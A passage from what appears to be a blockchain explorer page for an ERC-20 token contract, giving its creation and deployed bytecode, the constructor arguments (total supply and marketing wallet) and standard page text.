91505b81811015620004995782815560010162000484565b505050505050565b81516001600160401b03811115620004bd57620004bd620003fd565b620004d581620004ce845462000413565b846200044f565b602080601f8311600181146200050d5760008415620004f45750858301515b600019600386901b1c1916600185901b17855562000499565b600085815260208120601f198616915b828110156200053e578886015182559484019460019091019084016200051d565b50858210156200055d5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b80820281158282048414176200035a576200035a6200056d565b600082620005bb57634e487b7160e01b600052601260045260246000fd5b500490565b808201808211156200035a576200035a6200056d565b60805161189a620006076000396000818161024a015281816113660152818161141f015261145b015261189a6000f3fe6080604052600436106101d15760003560e01c80637571336a116100f7578063a457c2d711610095578063c8c8ebe411610064578063c8c8ebe414610557578063d631069c1461056d578063dd62ed3e14610583578063f2fde38b146105c957600080fd5b8063a457c2d7146104d7578063a522ad25146104f7578063a9059cbb14610517578063c02466681461053757600080fd5b806389f9a1d3116100d157806389f9a1d31461046e5780638da5cb5b1461048457806391221716146104a257806395d89b41146104c257600080fd5b80637571336a1461040d57806375f0a8741461042d578063860a32ec1461044d57600080fd5b8063395093511161016f5780636ddd17131161013e5780636ddd17131461038157806370a08231146103a2578063715018a6146103d8578063756ba9d8146103ed57600080fd5b8063395093511461030157806349bd5a5e146103215780635d60c7be1461034157806368742da61461036157600080fd5b806318160ddd116101ab57806318160ddd14610284578063239be29a146102a357806323b872dd146102c5578063313ce567146102e557600080fd5b806306fdde03146101dd578063095ea7b3146102085780631694505e1461023857600080fd5b366101d857005b600080fd5b3480156101e957600080fd5b506101f26105e9565b6040516101ff91906114c7565b60405180910390f35b34801561021457600080fd5b5061022861022336600461152a565b61067b565b60405190151581526020016101ff565b34801561024457600080fd5b5061026c7f000000000000000000000000000000000000000000000000000000000000000081565b6040516001600160a01b0390911681526020016101ff565b34801561029057600080fd5b506002545b6040519081526020016101ff565b3480156102af57600080fd5b506102c36102be36600461156b565b610692565b005b3480156102d157600080fd5b506102286102e0366004611586565b6106b8565b3480156102f157600080fd5b50604051601281526020016101ff565b34801561030d57600080fd5b5061022861031c36600461152a565b610721565b34801561032d57600080fd5b50600c5461026c906001600160a01b031681565b34801561034d57600080fd5b50600a5461026c906001600160a01b031681565b34801561036d57600080fd5b506102c361037c3660046115c7565b610757565b34801561038d57600080fd5b50600c5461022890600160a81b900460ff1681565b3480156103ae57600080fd5b506102956103bd3660046115c7565b6001600160a01b031660009081526020819052604090205490565b3480156103e457600080fd5b506102c36107d7565b3480156103f957600080fd5b506102c36104083660046115e4565b6107eb565b34801561041957600080fd5b506102c3610428366004611617565b61081b565b34801561043957600080fd5b50600b5461026c906001600160a01b031681565b34801561045957600080fd5b50600c5461022890600160a01b900460ff1681565b34801561047a57600080fd5b5061029560075481565b34801561049057600080fd5b506005546001600160a01b031661026c565b3480156104ae57600080fd5b506102c36104bd3660046115c7565b61084e565b3480156104ce57600080fd5b506101f26108b1565b3480156104e357600080fd5b506102286104f236600461152a565b6108c0565b34801561050357600080fd5b506102c361051236600461164c565b61090f565b34801561052357600080fd5b5061022861053236600461152a565b610994565b34801561054357600080fd5b506102c3610552366004611617565b6109a1565b34801561056357600080fd5b5061029560085481565b34801561057957600080fd5b5061029560065481565b34801561058f57600080fd5b5061029561059e36600461164c565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b3480156105d557600080fd5b506102c36105e43660046115c7565b6109d4565b6060600380546105f890611685565b80601f016020809104026020016040519081016040528092919081815260200182805461062490611685565b80156106715780601f1061064657610100808354040283529160200191610671565b820191906000526020600020905b81548152906001019060200180831161065457829003601f168201915b5050505050905090565b6000610688338484610a4d565b5060015b92915050565b61069a610b72565b600c8054911515600160a81b0260ff60a81b19909216919091179055565b60006106c5848484610bcc565b610717843361071285604051806060016040528060288152602001611818602891396001600160a01b038a1660009081526001602090815260408083203384529091529020549190611032565b610a4d565b5060019392505050565b3360008181526001602090815260408083206001600160a01b03871684529091528120549091610688918590610712908661105e565b61075f610b72565b6000816001600160a01b03164760405160006040518083038185875af1925050503d80600081146107ac576040519150601f19603f3d011682016040523d82523d6000602084013e6107b1565b606091505b50509050806107d357604051631d42c86760e21b815260040160405180910390fd5b5050565b6107df610b72565b6107e96000611071565b565b6107f3610b72565b600c8054931515600160a01b0260ff60a01b1990941693909317909255600891909155600755565b610823610b72565b6001600160a01b03919091166000908152600e60205260409020805460ff1916911515919091179055565b610856610b72565b6006541561088b57600c54604051636916e2b160e01b81526001600160a01b0390911660048201526024015b60405180910390fd5b600c80546001600160a01b0319166001600160a01b039290921691909117905542600655565b6060600480546105f890611685565b6000610688338461071285604051806060016040528060258152602001611840602591393360009081526001602090815260408083206001600160a01b038d1684529091529020549190611032565b610917610b72565b6040516370a0823160e01b81523060048201526000906001600160a01b038316906370a0823190602401602060405180830381865afa15801561095e573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061098291906116bf565b905061098f308483610bcc565b505050565b6000610688338484610bcc565b6109a9610b72565b6001600160a01b03919091166000908152600d60205260409020805460ff1916911515919091179055565b6109dc610b72565b6001600160a01b038116610a415760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610882565b610a4a81611071565b50565b6001600160a01b038316610aaf5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610882565b6001600160a01b038216610b105760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610882565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6005546001600160a01b031633146107e95760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610882565b600c546001600160a01b0316158015610bed57506001600160a01b03831615155b8015610c0757506005546001600160a01b03848116911614155b15610c25576040516366eb772360e01b815260040160405180910390fd5b6005546001600160a01b03848116911614801590610c5157506005546001600160a01b03838116911614155b8015610c6557506001600160a01b03821615155b8015610c7c57506001600160a01b03821661dead14155b8015610c925750600c54600160b01b900460ff16155b15610e2e57600c54600160a01b900460ff1615610e2e57600c546001600160a01b038481169116148015610cdf57506001600160a01b0382166000908152600e602052604090205460ff16155b15610d5e57600854811115610d0a57604051630da27c9560e41b815260048101829052602401610882565b60075481610d2d846001600160a01b031660009081526020819052604090205490565b610d3791906116ee565b1115610d5957604051639b440edf60e01b815260048101829052602401610882565b610e2e565b600c546001600160a01b038381169116148015610d9457506001600160a01b0383166000908152600e602052604090205460ff16155b15610dbf57600854811115610d5957604051630da27c9560e41b815260048101829052602401610882565b6001600160a01b0382166000908152600e602052604090205460ff16610e2e5760075481610e02846001600160a01b031660009081526020819052604090205490565b610e0c91906116ee565b1115610e2e57604051639b440edf60e01b815260048101829052602401610882565b3060009081526020819052604090205460095481108015908190610e5b5750600c54600160a81b900460ff165b8015610e715750600c54600160b01b900460ff16155b8015610e8b5750600c546001600160a01b03868116911614155b8015610eb057506001600160a01b0385166000908152600d602052604090205460ff16155b8015610ed557506001600160a01b0384166000908152600d602052604090205460ff16155b15610f0457600c805460ff60b01b1916600160b01b179055610ef6826110c3565b600c805460ff60b01b191690555b600c546001600160a01b0386166000908152600d602052604090205460ff600160b01b909204821615911680610f5257506001600160a01b0385166000908152600d602052604090205460ff165b15610f5b575060005b801561101f576000806000610f6f42611128565b600c5492955090935091506001600160a01b038a81169116148015610f915750805b15610fc95760006064610fa4858a611701565b610fae9190611718565b9050610fbb8a308361118c565b610fc5818961173a565b9750505b600c546001600160a01b038981169116148015610fe35750805b1561101b5760006064610ff6848a611701565b6110009190611718565b905061100d8a308361118c565b611017818961173a565b9750505b5050505b61102a86868661118c565b505050505050565b600081848411156110565760405162461bcd60e51b815260040161088291906114c7565b505050900390565b600061106a82846116ee565b9392505050565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b806000036110ce5750565b6110d78161130f565b600b5460405147916000916001600160a01b039091169083908381818185875af1925050503d806000811461102a576040519150601f19603f3d011682016040523d82523d6000602084013e61102a565b6000806000806006548561113c919061173a565b90506002806001603c84101561115c57506019915060329050600161117e565b603c841015801561116e575061012c84105b1561117e5750600a915081905060015b919790965090945092505050565b6001600160a01b0383166111f05760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610882565b6001600160a01b0382166112525760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610882565b61128f816040518060600160405280602681526020016117f2602691396001600160a01b0386166000908152602081905260409020549190611032565b6001600160a01b0380851660009081526020819052604080822093909355908416815220546112be908261105e565b6001600160a01b038381166000818152602081815260409182902094909455518481529092918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9101610b65565b60408051600280825260608201835260009260208301908036833701905050905030816000815181106113445761134461174d565b60200260200101906001600160a01b031690816001600160a01b0316815250507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156113c2573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906113e69190611763565b816001815181106113f9576113f961174d565b60200260200101906001600160a01b031690816001600160a01b031681525050611444307f000000000000000000000000000000000000000000000000000000000000000084610a4d565b60405163791ac94760e01b81526001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000169063791ac94790611499908590600090869030904290600401611780565b600060405180830381600087803b1580156114b357600080fd5b505af115801561102a573d6000803e3d6000fd5b600060208083528351808285015260005b818110156114f4578581018301518582016040015282016114d8565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114610a4a57600080fd5b6000806040838503121561153d57600080fd5b823561154881611515565b946020939093013593505050565b8035801515811461156657600080fd5b919050565b60006020828403121561157d57600080fd5b61106a82611556565b60008060006060848603121561159b57600080fd5b83356115a681611515565b925060208401356115b681611515565b929592945050506040919091013590565b6000602082840312156115d957600080fd5b813561106a81611515565b6000806000606084860312156115f957600080fd5b61160284611556565b95602085013595506040909401359392505050565b6000806040838503121561162a57600080fd5b823561163581611515565b915061164360208401611556565b90509250929050565b6000806040838503121561165f57600080fd5b823561166a81611515565b9150602083013561167a81611515565b809150509250929050565b600181811c9082168061169957607f821691505b6020821081036116b957634e487b7160e01b600052602260045260246000fd5b50919050565b6000602082840312156116d157600080fd5b5051919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561068c5761068c6116d8565b808202811582820484141761068c5761068c6116d8565b60008261173557634e487b7160e01b600052601260045260246000fd5b500490565b8181038181111561068c5761068c6116d8565b634e487b7160e01b600052603260045260246000fd5b60006020828403121561177557600080fd5b815161106a81611515565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b818110156117d05784516001600160a01b0316835293830193918301916001016117ab565b50506001600160a01b0396909616606085015250505060800152939250505056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212206f05244faf77550841931472951774bbde2e68595098e12bd8fe77eafb55f6bd64736f6c6343000813003300000000000000000000000000000000000000000052b7d2dcc80cd2e400000000000000000000000000000069960d17b763d331bab3b3f79b1f6f793979ec22
Deployed Bytecode
0x6080604052600436106101d15760003560e01c80637571336a116100f7578063a457c2d711610095578063c8c8ebe411610064578063c8c8ebe414610557578063d631069c1461056d578063dd62ed3e14610583578063f2fde38b146105c957600080fd5b8063a457c2d7146104d7578063a522ad25146104f7578063a9059cbb14610517578063c02466681461053757600080fd5b806389f9a1d3116100d157806389f9a1d31461046e5780638da5cb5b1461048457806391221716146104a257806395d89b41146104c257600080fd5b80637571336a1461040d57806375f0a8741461042d578063860a32ec1461044d57600080fd5b8063395093511161016f5780636ddd17131161013e5780636ddd17131461038157806370a08231146103a2578063715018a6146103d8578063756ba9d8146103ed57600080fd5b8063395093511461030157806349bd5a5e146103215780635d60c7be1461034157806368742da61461036157600080fd5b806318160ddd116101ab57806318160ddd14610284578063239be29a146102a357806323b872dd146102c5578063313ce567146102e557600080fd5b806306fdde03146101dd578063095ea7b3146102085780631694505e1461023857600080fd5b366101d857005b600080fd5b3480156101e957600080fd5b506101f26105e9565b6040516101ff91906114c7565b60405180910390f35b34801561021457600080fd5b5061022861022336600461152a565b61067b565b60405190151581526020016101ff565b34801561024457600080fd5b5061026c7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b6040516001600160a01b0390911681526020016101ff565b34801561029057600080fd5b506002545b6040519081526020016101ff565b3480156102af57600080fd5b506102c36102be36600461156b565b610692565b005b3480156102d157600080fd5b506102286102e0366004611586565b6106b8565b3480156102f157600080fd5b50604051601281526020016101ff565b34801561030d57600080fd5b5061022861031c36600461152a565b610721565b34801561032d57600080fd5b50600c5461026c906001600160a01b031681565b34801561034d57600080fd5b50600a5461026c906001600160a01b031681565b34801561036d57600080fd5b506102c361037c3660046115c7565b610757565b34801561038d57600080fd5b50600c5461022890600160a81b900460ff1681565b3480156103ae57600080fd5b506102956103bd3660046115c7565b6001600160a01b031660009081526020819052604090205490565b3480156103e457600080fd5b506102c36107d7565b3480156103f957600080fd5b506102c36104083660046115e4565b6107eb565b34801561041957600080fd5b506102c3610428366004611617565b61081b565b34801561043957600080fd5b50600b5461026c906001600160a01b031681565b34801561045957600080fd5b50600c5461022890600160a01b900460ff1681565b34801561047a57600080fd5b5061029560075481565b34801561049057600080fd5b506005546001600160a01b031661026c565b3480156104ae57600080fd5b506102c36104bd3660046115c7565b61084e565b3480156104ce57600080fd5b506101f26108b1565b3480156104e357600080fd5b506102286104f236600461152a565b6108c0565b34801561050357600080fd5b506102c361051236600461164c565b61090f565b34801561052357600080fd5b5061022861053236600461152a565b610994565b34801561054357600080fd5b506102c3610552366004611617565b6109a1565b34801561056357600080fd5b5061029560085481565b34801561057957600080fd5b5061029560065481565b34801561058f57600080fd5b5061029561059e36600461164c565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b3480156105d557600080fd5b506102c36105e43660046115c7565b6109d4565b6060600380546105f890611685565b80601f016020809104026020016040519081016040528092919081815260200182805461062490611685565b80156106715780601f1061064657610100808354040283529160200191610671565b820191906000526020600020905b81548152906001019060200180831161065457829003601f168201915b5050505050905090565b6000610688338484610a4d565b5060015b92915050565b61069a610b72565b600c8054911515600160a81b0260ff60a81b19909216919091179055565b60006106c5848484610bcc565b610717843361071285604051806060016040528060288152602001611818602891396001600160a01b038a1660009081526001602090815260408083203384529091529020549190611032565b610a4d565b5060019392505050565b3360008181526001602090815260408083206001600160a01b03871684529091528120549091610688918590610712908661105e565b61075f610b72565b6000816001600160a01b03164760405160006040518083038185875af1925050503d80600081146107ac576040519150601f19603f3d011682016040523d82523d6000602084013e6107b1565b606091505b50509050806107d357604051631d42c86760e21b815260040160405180910390fd5b5050565b6107df610b72565b6107e96000611071565b565b6107f3610b72565b600c8054931515600160a01b0260ff60a01b1990941693909317909255600891909155600755565b610823610b72565b6001600160a01b03919091166000908152600e60205260409020805460ff1916911515919091179055565b610856610b72565b6006541561088b57600c54604051636916e2b160e01b81526001600160a01b0390911660048201526024015b60405180910390fd5b600c80546001600160a01b0319166001600160a01b039290921691909117905542600655565b6060600480546105f890611685565b6000610688338461071285604051806060016040528060258152602001611840602591393360009081526001602090815260408083206001600160a01b038d1684529091529020549190611032565b610917610b72565b6040516370a0823160e01b81523060048201526000906001600160a01b038316906370a0823190602401602060405180830381865afa15801561095e573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061098291906116bf565b905061098f308483610bcc565b505050565b6000610688338484610bcc565b6109a9610b72565b6001600160a01b03919091166000908152600d60205260409020805460ff1916911515919091179055565b6109dc610b72565b6001600160a01b038116610a415760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610882565b610a4a81611071565b50565b6001600160a01b038316610aaf5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610882565b6001600160a01b038216610b105760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610882565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6005546001600160a01b031633146107e95760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610882565b600c546001600160a01b0316158015610bed57506001600160a01b03831615155b8015610c0757506005546001600160a01b03848116911614155b15610c25576040516366eb772360e01b815260040160405180910390fd5b6005546001600160a01b03848116911614801590610c5157506005546001600160a01b03838116911614155b8015610c6557506001600160a01b03821615155b8015610c7c57506001600160a01b03821661dead14155b8015610c925750600c54600160b01b900460ff16155b15610e2e57600c54600160a01b900460ff1615610e2e57600c546001600160a01b038481169116148015610cdf57506001600160a01b0382166000908152600e602052604090205460ff16155b15610d5e57600854811115610d0a57604051630da27c9560e41b815260048101829052602401610882565b60075481610d2d846001600160a01b031660009081526020819052604090205490565b610d3791906116ee565b1115610d5957604051639b440edf60e01b815260048101829052602401610882565b610e2e565b600c546001600160a01b038381169116148015610d9457506001600160a01b0383166000908152600e602052604090205460ff16155b15610dbf57600854811115610d5957604051630da27c9560e41b815260048101829052602401610882565b6001600160a01b0382166000908152600e602052604090205460ff16610e2e5760075481610e02846001600160a01b031660009081526020819052604090205490565b610e0c91906116ee565b1115610e2e57604051639b440edf60e01b815260048101829052602401610882565b3060009081526020819052604090205460095481108015908190610e5b5750600c54600160a81b900460ff165b8015610e715750600c54600160b01b900460ff16155b8015610e8b5750600c546001600160a01b03868116911614155b8015610eb057506001600160a01b0385166000908152600d602052604090205460ff16155b8015610ed557506001600160a01b0384166000908152600d602052604090205460ff16155b15610f0457600c805460ff60b01b1916600160b01b179055610ef6826110c3565b600c805460ff60b01b191690555b600c546001600160a01b0386166000908152600d602052604090205460ff600160b01b909204821615911680610f5257506001600160a01b0385166000908152600d602052604090205460ff165b15610f5b575060005b801561101f576000806000610f6f42611128565b600c5492955090935091506001600160a01b038a81169116148015610f915750805b15610fc95760006064610fa4858a611701565b610fae9190611718565b9050610fbb8a308361118c565b610fc5818961173a565b9750505b600c546001600160a01b038981169116148015610fe35750805b1561101b5760006064610ff6848a611701565b6110009190611718565b905061100d8a308361118c565b611017818961173a565b9750505b5050505b61102a86868661118c565b505050505050565b600081848411156110565760405162461bcd60e51b815260040161088291906114c7565b505050900390565b600061106a82846116ee565b9392505050565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b806000036110ce5750565b6110d78161130f565b600b5460405147916000916001600160a01b039091169083908381818185875af1925050503d806000811461102a576040519150601f19603f3d011682016040523d82523d6000602084013e61102a565b6000806000806006548561113c919061173a565b90506002806001603c84101561115c57506019915060329050600161117e565b603c841015801561116e575061012c84105b1561117e5750600a915081905060015b919790965090945092505050565b6001600160a01b0383166111f05760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610882565b6001600160a01b0382166112525760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610882565b61128f816040518060600160405280602681526020016117f2602691396001600160a01b0386166000908152602081905260409020549190611032565b6001600160a01b0380851660009081526020819052604080822093909355908416815220546112be908261105e565b6001600160a01b038381166000818152602081815260409182902094909455518481529092918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9101610b65565b60408051600280825260608201835260009260208301908036833701905050905030816000815181106113445761134461174d565b60200260200101906001600160a01b031690816001600160a01b0316815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156113c2573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906113e69190611763565b816001815181106113f9576113f961174d565b60200260200101906001600160a01b031690816001600160a01b031681525050611444307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d84610a4d565b60405163791ac94760e01b81526001600160a01b037f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d169063791ac94790611499908590600090869030904290600401611780565b600060405180830381600087803b1580156114b357600080fd5b505af115801561102a573d6000803e3d6000fd5b600060208083528351808285015260005b818110156114f4578581018301518582016040015282016114d8565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114610a4a57600080fd5b6000806040838503121561153d57600080fd5b823561154881611515565b946020939093013593505050565b8035801515811461156657600080fd5b919050565b60006020828403121561157d57600080fd5b61106a82611556565b60008060006060848603121561159b57600080fd5b83356115a681611515565b925060208401356115b681611515565b929592945050506040919091013590565b6000602082840312156115d957600080fd5b813561106a81611515565b6000806000606084860312156115f957600080fd5b61160284611556565b95602085013595506040909401359392505050565b6000806040838503121561162a57600080fd5b823561163581611515565b915061164360208401611556565b90509250929050565b6000806040838503121561165f57600080fd5b823561166a81611515565b9150602083013561167a81611515565b809150509250929050565b600181811c9082168061169957607f821691505b6020821081036116b957634e487b7160e01b600052602260045260246000fd5b50919050565b6000602082840312156116d157600080fd5b5051919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561068c5761068c6116d8565b808202811582820484141761068c5761068c6116d8565b60008261173557634e487b7160e01b600052601260045260246000fd5b500490565b8181038181111561068c5761068c6116d8565b634e487b7160e01b600052603260045260246000fd5b60006020828403121561177557600080fd5b815161106a81611515565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b818110156117d05784516001600160a01b0316835293830193918301916001016117ab565b50506001600160a01b0396909616606085015250505060800152939250505056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212206f05244faf77550841931472951774bbde2e68595098e12bd8fe77eafb55f6bd64736f6c63430008130033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
00000000000000000000000000000000000000000052b7d2dcc80cd2e400000000000000000000000000000069960d17b763d331bab3b3f79b1f6f793979ec22
-----Decoded View---------------
Arg [0] : _totalSupply (uint256): 100000000000000000000000000
Arg [1] : _marketingWallet (address): 0x69960D17B763d331Bab3B3f79B1F6f793979eC22
-----Encoded View---------------
2 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000052b7d2dcc80cd2e4000000
Arg [1] : 00000000000000000000000069960d17b763d331bab3b3f79b1f6f793979ec22
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.